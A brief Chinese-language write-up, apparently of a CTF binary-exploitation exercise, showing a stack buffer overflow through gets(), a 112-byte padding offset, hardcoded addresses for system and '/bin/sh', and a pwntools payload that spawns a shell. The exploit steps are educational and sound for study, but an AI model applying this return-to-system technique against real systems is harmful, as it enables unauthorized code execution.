1.检查安全保护机制
发现开始nx(栈段不可执行)
2.ida 反汇编
大概明白 最后一个函数是gets函数 存在漏洞
3.查看v4距离返回地址存在多少字节
找到返回地址:
填充字节为:71c-6ac = 112(十进制)
寻找system函数 使用gdb info function system
0x08048460
寻找”/bin/sh“
0x08048720
4.由于调用函数需要压入参数 , push eip 模仿调用
playload = flat([ 112 * "a",systemcl_addr,"bbbb",binsh_addr ])
获取shell